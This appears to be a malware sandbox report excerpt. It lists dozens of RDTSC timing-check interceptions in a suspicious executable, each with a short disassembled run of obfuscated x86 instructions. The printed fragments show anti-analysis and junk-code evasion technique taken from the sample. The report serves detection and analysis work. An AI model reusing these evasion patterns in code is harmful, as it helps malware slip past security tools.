                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71F0 second address: 11B7255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FCCB120DFD6h 0x00000009 ja 00007FCCB120DFD6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jbe 00007FCCB120DFE6h 0x0000001c jmp 00007FCCB120DFE0h 0x00000021 pop eax 0x00000022 jmp 00007FCCB120DFE3h 0x00000027 lea ebx, dword ptr [ebp+138F1FBEh] 0x0000002d sub dword ptr [ebp+13763309h], edx 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FCCB120DFE6h 0x0000003b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B72DA second address: 11B7302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB0D02D0Eh 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7302 second address: 11B7353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 32357646h 0x0000000e mov dl, ah 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FCCB120DFD8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov cx, A4EFh 0x00000032 push 00000003h 0x00000034 xor dword ptr [ebp+13763676h], edx 0x0000003a push B7BDBA2Fh 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FCCB120DFDDh 0x00000047 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B744F second address: 11B7454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7454 second address: 11B74D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4FFF7F21h 0x00000013 or edx, 744D09E7h 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+1376B64Bh], edx 0x00000021 mov edx, dword ptr [ebp+13762C74h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FCCB120DFD8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov dword ptr [ebp+13762DB2h], edx 0x00000049 push 00000003h 0x0000004b jmp 00007FCCB120DFE2h 0x00000050 mov esi, dword ptr [ebp+1376375Fh] 0x00000056 push 7E2282CDh 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B74D0 second address: 11B74D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B74D5 second address: 11B750E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCCB120DFD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 41DD7D33h 0x00000013 mov edi, 4C09BFCFh 0x00000018 lea ebx, dword ptr [ebp+138F1FD2h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+1376310Bh], eax 0x00000025 mov esi, dword ptr [ebp+137621E6h] 0x0000002b popad 0x0000002c mov dword ptr [ebp+13763676h], edi 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 pop eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B750E second address: 11B7529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCCB0D02D14h 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C9722 second address: 11C973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB120DFE6h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C973C second address: 11C975C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnl 00007FCCB0D02D06h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C975C second address: 11C9762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C9762 second address: 11C9766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A6384 second address: 11A6388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D695E second address: 11D6962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AA0 second address: 11D6AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AA5 second address: 11D6ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB0D02D0Ah 0x0000000b popad 0x0000000c jc 00007FCCB0D02D0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6ABE second address: 11D6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FCCB120DFD8h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AD1 second address: 11D6AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ch 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6EC4 second address: 11D6EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A63B2 second address: 11A63B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D749A second address: 11D74A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D74A5 second address: 11D74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D74AA second address: 11D74E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB120DFDCh 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FCCB120DFD6h 0x00000010 popad 0x00000011 jmp 00007FCCB120DFDEh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007FCCB120DFDCh 0x00000020 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D769B second address: 11D76A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D76A1 second address: 11D76B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDCh 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D76B1 second address: 11D76B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D7831 second address: 11D785B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCCB120DFDBh 0x0000000e js 00007FCCB120DFD6h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD37 second address: 11CAD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD3B second address: 11CAD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD51 second address: 11CAD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB0D02D12h 0x00000009 jmp 00007FCCB0D02D11h 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1195A1C second address: 1195A42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB120DFE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB120DFDAh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D7F8F second address: 11D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D8112 second address: 11D8118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D83FE second address: 11D8408 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D86AD second address: 11D86B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D86B3 second address: 11D86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jne 00007FCCB0D02D06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11DD250 second address: 11DD254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3986 second address: 11E398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E398F second address: 11E399E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3DC8 second address: 11E3DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E3DCC second address: 11E3DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E654E second address: 11E655C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E655C second address: 11E65A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007FCCB120DFD8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FCCB120DFE2h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c js 00007FCCB120DFFAh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCCB120DFE8h 0x00000029 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E65A5 second address: 11E65A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E65A9 second address: 11E65F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FCCB120DFD8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov di, bx 0x00000024 push 907B0369h 0x00000029 push eax 0x0000002a push edx 0x0000002b jne 00007FCCB120DFECh 0x00000031 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6906 second address: 11E6914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCCB0D02D06h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6A9D second address: 11E6AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E71AF second address: 11E71B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7404 second address: 11E7409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7409 second address: 11E741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FCCB0D02D08h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7506 second address: 11E750C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E750C second address: 11E7510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E76F5 second address: 11E76F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E76F9 second address: 11E7703 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7703 second address: 11E7724 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCCB120DFE4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E785D second address: 11E7862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8787 second address: 11E8817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB120DFD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FCCB120DFDCh 0x00000014 jnp 00007FCCB120DFD6h 0x0000001a jp 00007FCCB120DFDCh 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FCCB120DFD8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c jmp 00007FCCB120DFE4h 0x00000041 pushad 0x00000042 mov dh, 60h 0x00000044 mov dword ptr [ebp+13762927h], edi 0x0000004a popad 0x0000004b push 00000000h 0x0000004d mov edi, ecx 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+13761905h], ecx 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FCCB120DFE6h 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8817 second address: 11E884A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FCCB0D02D19h 0x00000010 jmp 00007FCCB0D02D13h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FCCB0D02D0Ch 0x0000001f jne 00007FCCB0D02D06h 0x00000025 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E884A second address: 11E8854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E9860 second address: 11E986D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCCB0D02D06h 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA327 second address: 11EA34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+137631DCh] 0x0000000e push 00000000h 0x00000010 stc 0x00000011 push 00000000h 0x00000013 sub si, 2CDCh 0x00000018 sub esi, 6470F37Ah 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007FCCB120DFD6h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA0BF second address: 11EA0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EB4AA second address: 11EB4CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB120DFE8h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA0C3 second address: 11EA0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EB738 second address: 11EB73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECAD6 second address: 11ECADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE690 second address: 11EE6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FCCB120DFD8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECADB second address: 11ECAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE6A1 second address: 11EE710 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB120DFDCh 0x00000008 jnc 00007FCCB120DFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FCCB120DFD8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FCCB120DFD8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FCCB120DFDEh 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F083C second address: 11F084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007FCCB0D02D06h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EF9F1 second address: 11EF9F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F084F second address: 11F0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 ja 00007FCCB0D02D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+138EBA35h], ecx 0x00000015 push 00000000h 0x00000017 adc di, 33BBh 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+13763641h], ecx 0x00000024 sbb ebx, 1EC5F118h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d jp 00007FCCB0D02D06h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EF9F8 second address: 11EFA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FCCB120DFE7h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0884 second address: 11F089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FCCB0D02D06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F1959 second address: 11F195D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B0F second address: 11F0B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F195D second address: 11F196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FCCB120DFD8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B19 second address: 11F0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCCB0D02D06h 0x0000000f rdtsc
